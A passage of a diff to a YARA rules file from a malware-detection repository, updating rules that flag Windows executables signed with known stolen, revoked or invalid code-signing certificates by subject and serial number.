+		logic_hash = "5c181dab1f39138c67650d6654353de2be29cdbf45e0f5235776d28d40194f24"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a04c0281bc2203a95ef9bd6d9736486449d80905"
+		thumbprint = "2e25e7e8abc238b05de5e2a482e51ed324fbaa76"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enigma Protector CA" and pe.signatures [ i ] . serial == "25:ad:5a:e6:8c:38:ad:10:21:08:6f:4f:fc:8b:a4:70" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x96\\xAF\\xD0\\xA8\\xD0\\xA8\\xE5\\xBC\\x97\\xE6\\xAF\\x94\\xE5\\xBC\\x97\\xD0\\xA8\\xE6\\xAF\\x94\\xD0\\xA8\\xE5\\xBC\\x97\\xD0\\xA8\\xE5\\xB0\\x94\\xE5\\xBC\\x97\\xE5\\xBC\\x97\\xD0\\xA8\\xE5\\xB0\\x94\\xD0\\xA8\\xE6\\x96\\xAF\\xE5\\xB0\\x94\\xE5\\xBC\\x97" and pe.signatures [ i ] . serial == "00:b0:ec:d3:2f:95:f8:76:1b:8a:6d:57:10:c7:f3:45:90" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_277Cd16De5D61B9398B645Afe41C09C7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3A727248E1940C5Bf91A466B29C3B9Cd : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d5ada3bf-322a-5794-aff7-75ff8dd9a7d1"
+		id = "db43ed73-de46-526e-a255-137a4eaaedce"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6392-L6403"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1153-L1164"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dccfd52a3bcc11897d05f5450600dbd2f1f699732341cebed6dda37a76fd5f2d"
+		logic_hash = "0afeb50b36d0ca1adbd6cb3accccb3ee093434b8c0bd8b03ae70ecc45c7423b5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "11a18b9ba48e2b715202def00c2005a394786b23"
+		thumbprint = "eeeb3a616bb50138f84fc0561d883b47ac1d3d3d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE SIGN COMPANY LIMITED" and pe.signatures [ i ] . serial == "27:7c:d1:6d:e5:d6:1b:93:98:b6:45:af:e4:1c:09:c7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x90\\x89\\xE5\\x90\\x89\\xD0\\x98\\xE5\\x90\\x89\\xD0\\x98\\xE4\\xB8\\x9D\\xE4\\xB8\\x9D" and pe.signatures [ i ] . serial == "3a:72:72:48:e1:94:0c:5b:f9:1a:46:6b:29:c3:b9:cd" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_066276Af2F2C7E246D3B1Cab1B4Aa42E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ce40906451925405D0F6C130Db461F71 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "32b8e28b-361f-53e5-b06c-504dd9e86ae9"
+		id = "5e858504-b1c4-579e-b0e8-f6cf4f434672"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6405-L6416"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1166-L1177"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2a554105ae99de388621adefb2f53d2d0873ac3175ca2ccf00fc6a498ea2fd29"
+		logic_hash = "02b03b18942cff20ddce429f7be7cc9e54dfbf4884c79c7438c9b9d4415c5b93"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "dee5ca4be94a8737c85bbee27bd9d81b235fb700"
+		thumbprint = "af79bbdb4fa0724f907343e9b1945ffffb34e9b3"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IQ Trade ApS" and pe.signatures [ i ] . serial == "06:62:76:af:2f:2c:7e:24:6d:3b:1c:ab:1b:4a:a4:2e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xD0\\xA5\\xE7\\xBB\\xB4\\xE6\\x9D\\xB0\\xE6\\x96\\xAF\\xE6\\x96\\xAF\\xE7\\xBB\\xB4\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xD0\\xA5\\xE6\\x96\\xAF\\xD0\\xA5\\xD0\\xA5\\xE6\\x96\\xAF\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE6\\x96\\xAF\\xE6\\x9D\\xB0" and pe.signatures [ i ] . serial == "00:ce:40:90:64:51:92:54:05:d0:f6:c1:30:db:46:1f:71" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_289051A83F350A2C600187C99B6C0A73 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00E130D3537E0B7A4Dda47B4D6F95F9481 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "f84a7749-a487-52e5-813b-e376ccde13d1"
+		id = "efcc63ba-51f9-5b16-a33d-05d536efa6c6"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6418-L6429"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1179-L1190"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f094e923dc53cc1edc6ac83cf69fb60fd3c564606a5bfb68facb482918399799"
+		logic_hash = "c394a115fa3fbd7fb2838b61b3c439df3daa9aa44b1901d1740060df0539411e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4e075adea8c1bcb9d10904203ab81965f4912ff0"
+		thumbprint = "89f9786c8cb147b1dd7aa0eb871f51210550c6f4"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HALL HAULAGE LTD LTD" and pe.signatures [ i ] . serial == "28:90:51:a8:3f:35:0a:2c:60:01:87:c9:9b:6c:0a:73" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xBC\\x8A\\xE6\\x96\\xAF\\xE8\\x89\\xBE\\xE4\\xBC\\x8A\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xE5\\x8B\\x92" and pe.signatures [ i ] . serial == "00:e1:30:d3:53:7e:0b:7a:4d:da:47:b4:d6:f9:5f:94:81" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_25A28E418Ef2D55B87Ee715B42Afbedb : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4Bec555C48Aada75E83C09C9Ad22Dc7C : FILE
 {
 	meta:
-		description = "VMProtect Software CA Certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "dc0b80f1-c720-5d83-a92b-144b1fd05138"
+		id = "664b8f55-03f8-5f36-aaf7-60ee4e613af4"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6431-L6442"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1192-L1203"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be40d3b202b400eda7e78280b674823f789e292a35f0892ab3a323d1b055e789"
+		logic_hash = "de4562f70bbe25aa053f2476efca12b99cd4f2ee721df620d02d004bac2a59f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "14e375bd4a40ddd3310e05328dda16e84bac6d34"
+		thumbprint = "a2be2ab16e3020ddbff1ff37dbfe2d736be7a0d5"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enigma Protector CA" and pe.signatures [ i ] . serial == "25:a2:8e:41:8e:f2:d5:5b:87:ee:71:5b:42:af:be:db" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x92\\xE5\\xB1\\x81\\xE5\\xB0\\x94\\xE5\\x90\\xBE\\xD0\\x92\\xE5\\x90\\x89\\xE5\\xB0\\x94\\xE5\\x90\\xBE\\xD0\\x92\\xE4\\xB8\\x9D\\xE5\\xB1\\x81" and pe.signatures [ i ] . serial == "4b:ec:55:5c:48:aa:da:75:e8:3c:09:c9:ad:22:dc:7c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Vmprotect_Client : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_009356E0361Bcf983Ab14276C332F814E7 : FILE
 {
 	meta:
-		description = "VMProtect Client Certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "f9fd6478-0fe5-54b6-ba33-79c02eb9ad04"
+		id = "6b5966d7-59ab-5d8a-936e-71b937424234"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6444-L6455"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1205-L1216"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d55d9fe608d5ff357a3bcf700a3d8bd9556f83c7c792b50d2276228a77209346"
+		logic_hash = "e85adfa9c004a46fe6060a36def3f8387de1484eb9fc3ae935d00265da135eab"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint1 = "2e20b7079e5d83e7987b2605db160d1561a0c07a"
-		hash1 = "284dc48fc2a66a1071117e5f7b2ad68fba4aae69f31cf68b6b950e6205b52dc0"
+		thumbprint = "f8bc145719666175a2bb3fcc62e0f3b2deccb030"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VMProtect Client " )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xE5\\x90\\x89\\xE4\\xB8\\x9D\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE4\\xB8\\x9D\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A\\xE6\\x9D\\xB0\\xE5\\x90\\x89\\xE4\\xBC\\x8A" and pe.signatures [ i ] . serial == "00:93:56:e0:36:1b:cf:98:3a:b1:42:76:c3:32:f8:14:e7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_44Fe73F320Aa8B7B4F5Ca910Aa22333A : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00E5D20477E850C9F35C5C47123Ef34271 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "fb7a2f49-d5b4-59af-b64b-27624ff18323"
+		id = "c8777008-b15f-58c8-9172-f54a4864d2cc"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6457-L6468"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1218-L1229"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a456cd32eed6c1f037bc565e7a43f2a5a2237749afc31f6b7a8b8d7a657973c6"
+		logic_hash = "984f6dba8613ca43a9ffdcba63e57516bd2c6df02698b87aa4a080f89cc6abc0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e952eb51416ab15c0a38b64a32348ed40b675043"
+		thumbprint = "d11431836db24dcc3a17de8027ab284a035f2e4f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alpeks LLC" and pe.signatures [ i ] . serial == "44:fe:73:f3:20:aa:8b:7b:4f:5c:a9:10:aa:22:33:3a" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xD0\\x92\\xE5\\xBE\\xB7\\xE8\\x89\\xBE\\xE5\\x8B\\x92\\xD0\\x92\\xE8\\xB4\\x9D\\xE8\\x89\\xBE\\xE5\\xBE\\xB7\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92\\xE8\\xB4\\x9D\\xE5\\x8B\\x92\\xD0\\x92\\xE5\\xBE\\xB7\\xE8\\xB4\\x9D\\xD0\\x92\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92" and pe.signatures [ i ] . serial == "00:e5:d2:04:77:e8:50:c9:f3:5c:5c:47:12:3e:f3:42:71" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Df45B36C9D0Bd248C3F9494E7Ca822 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00C865D49345F1Ed9A84Bea40743Cdf1D7 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "95100ec5-01bf-5a5a-a703-b10d320beed1"
+		id = "2ef45336-bb59-5510-af6f-29e41c9258b9"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6470-L6481"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1231-L1242"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "40f4ad4183ca0bc76295c535a9286994ef0e3f8ac932372328016d543bb58ab5"
+		logic_hash = "1a43e85e8c8d254dc3ba48ee9be5c233818fd6137967cd0235e802a2de1f9564"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4b1efa2410d9aab12af6c0b624a3738dd06d3353"
+		thumbprint = "d5e8afa85c6bf68d31af4a04668c3391e48b24b7"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MPO STORITVE d.o.o." and pe.signatures [ i ] . serial == "df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB0\\x94\\xE5\\x93\\xA6\\xD0\\x93\\xE8\\x89\\xBE\\xE5\\xB1\\x81\\xE5\\xB1\\x81\\xE5\\x93\\xA6\\xE5\\xB1\\x81\\xE5\\x93\\xA6\\xE7\\xBB\\xB4\\xE5\\x93\\xA6\\xE8\\x89\\xBE\\xE5\\xB0\\x94\\xE8\\x89\\xBE" and pe.signatures [ i ] . serial == "00:c8:65:d4:93:45:f1:ed:9a:84:be:a4:07:43:cd:f1:d7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Adbb8Aebf8B53C6713Abaca38Be9Bf0A : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_29F2093E925B7Fe70A9Ba7B909415251 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b3edea3e-8844-58a5-a600-b0695869b2c3"
+		id = "51c21421-18e4-52df-8fe7-75db7141824c"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6483-L6497"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1244-L1255"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d5e85240df57bf3b5ec4f690943f71609aaf2fb2f751b2919b6024b4247cd571"
+		logic_hash = "9b3c6a0571c096e431594d9331b3ae8127b02cc3cdf1e994a113026d77bbae4c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9f9b9f5a85d3005e4c613b6c2ba20b6d5d388645"
+		thumbprint = "f9fc647988e667ec92bdf1043ea1077da8f92ccc"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Konstant LLC" and ( pe.signatures [ i ] . serial == "ad:bb:8a:eb:f8:b5:3c:67:13:ab:ac:a3:8b:e9:bf:0a" or pe.signatures [ i ] . serial == "00:ad:bb:8a:eb:f8:b5:3c:67:13:ab:ac:a3:8b:e9:bf:0a" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x99\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A\\xE5\\x85\\x8B\\xD0\\x99\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x99\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xE4\\xB8\\x9D\\xD0\\x99\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xD0\\x9D\\xE8\\x89\\xBE\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A" and pe.signatures [ i ] . serial == "29:f2:09:3e:92:5b:7f:e7:0a:9b:a7:b9:09:41:52:51" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1Ffc9825644Caf5B1F521780C5C7F42C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0889E4181E71B16C4A810Bee38A78419 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b9ed2db5-b7d4-5d74-bb11-1e8b1dfe1648"
+		id = "e9ada9f1-4b52-5da6-ba82-3ea2625ccefd"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6499-L6510"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1257-L1268"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9866608a02a043e6873c6fbd231cd733b3b5a1e5b77e3205e5cf53f5ae2bcadd"
+		logic_hash = "2411f7ac79d18af295d77078c6e1c98c5a116ab24125c08946cb6ca09c28bc7b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4e7e022c7bb6bd90a75674a67f82e839d54a0a5e"
+		thumbprint = "bce3c17815ec9f720ba9c59126ae239c9caf856d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIVUS LIMITED" and pe.signatures [ i ] . serial == "1f:fc:98:25:64:4c:af:5b:1f:52:17:80:c5:c7:f4:2c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8B\\x92\\xE5\\xBC\\x97\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE5\\x90\\xBE\\xE4\\xBC\\x8A\\xE5\\x90\\xBE" and pe.signatures [ i ] . serial == "08:89:e4:18:1e:71:b1:6c:4a:81:0b:ee:38:a7:84:19" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3112C69D460C781Fd649C71E61Bfec82 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00C1Afabdaa1321F815Cdbb9467728Bc08 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "a8092e36-92f9-5cb0-a427-74d40a39d94f"
+		id = "e7904179-672a-5668-8b6d-f7f7090678fb"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6512-L6523"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1270-L1281"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9662a01369bc01367bcae7813b3fcb3050721471dd247885bcab8918de7c6b99"
+		logic_hash = "be637a192a90a35be9879d5e36fb3cf9a56ca4158329d6b1fad458e2d05e3d26"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7ec961d2c69f7686e33f39d497a5e3039e512cf3"
+		thumbprint = "e9c5fb9a7d3aba4b49c41b45249ed20c870f5c9e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREATURHANDLER BJARNE ANDERSEN ApS" and pe.signatures [ i ] . serial == "31:12:c6:9d:46:0c:78:1f:d6:49:c7:1e:61:bf:ec:82" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x92\\xD0\\x93\\xE5\\x84\\xBF\\xD0\\x93\\xE5\\x8B\\x92\\xD0\\x92\\xE5\\x8B\\x92\\xD0\\x93\\xD0\\x93\\xE5\\x84\\xBF\\xE8\\x89\\xBE\\xD0\\x92\\xD0\\x93\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xD0\\x92\\xD0\\x93\\xE8\\x89\\xBE\\xE9\\xA9\\xAC\\xD0\\x93\\xE8\\x89\\xBE\\xE9\\xA9\\xAC\\xD0\\x93" and pe.signatures [ i ] . serial == "00:c1:af:ab:da:a1:32:1f:81:5c:db:b9:46:77:28:bc:08" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_F64E5B34Dc0E4893495D3B9Fd9Cde4B7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_371381A66Fb96A07077860Ae4A6721E1 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d408b662-6328-55a8-ab64-42ea8f18c1cf"
+		id = "cd9c9965-922c-5ced-839c-97d1dcde33ff"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6525-L6536"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1283-L1294"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "497e63e4a19fa5b05d1098177dc73ae2255d4608d97e1001461dc4f8edced169"
+		logic_hash = "f087df37fdb6d921f411f130f26f9b5a58c36ae163bc88565178e0ed12be79d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "49373674eb2190c227455c9b5833825fe01f957a"
+		thumbprint = "c4419f095ae93d93e145d678ed31459506423d6a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMASoft" and pe.signatures [ i ] . serial == "f6:4e:5b:34:dc:0e:48:93:49:5d:3b:9f:d9:cd:e4:b7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE7\\xBB\\xB4\\xD0\\xA9\\xE5\\x90\\xBE\\xE7\\xBB\\xB4\\xD0\\xA9\\xD0\\xA9\\xE7\\xBB\\xB4\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xD0\\xA9\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xD0\\xA9\\xE5\\xA8\\x9C\\xE6\\x9D\\xB0\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xE5\\xA8\\x9C\\xE5\\xA8\\x9C\\xD0\\xA9" and pe.signatures [ i ] . serial == "37:13:81:a6:6f:b9:6a:07:07:78:60:ae:4a:67:21:e1" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6Bec31A0A40D2E834E51Ae704E1Bf9D3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Deb004E56D7Fcec1Caa8F2928D4E768 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "9228c13e-b380-5867-ad1f-e483c8977196"
+		id = "bb4e62b1-3528-56db-b004-1d590ad1ee61"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6538-L6549"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1296-L1307"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1fdd6e76deea106db9fc4ef0916b2cecd6edb3849847946f15c194a9028a76e"
+		logic_hash = "69910c81ce85bc59972b644f548a4382b8f3b70ec2737ada9da7adcb4779ce9c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7a236872302156c58d493b63a1607a09c4f1d0b8"
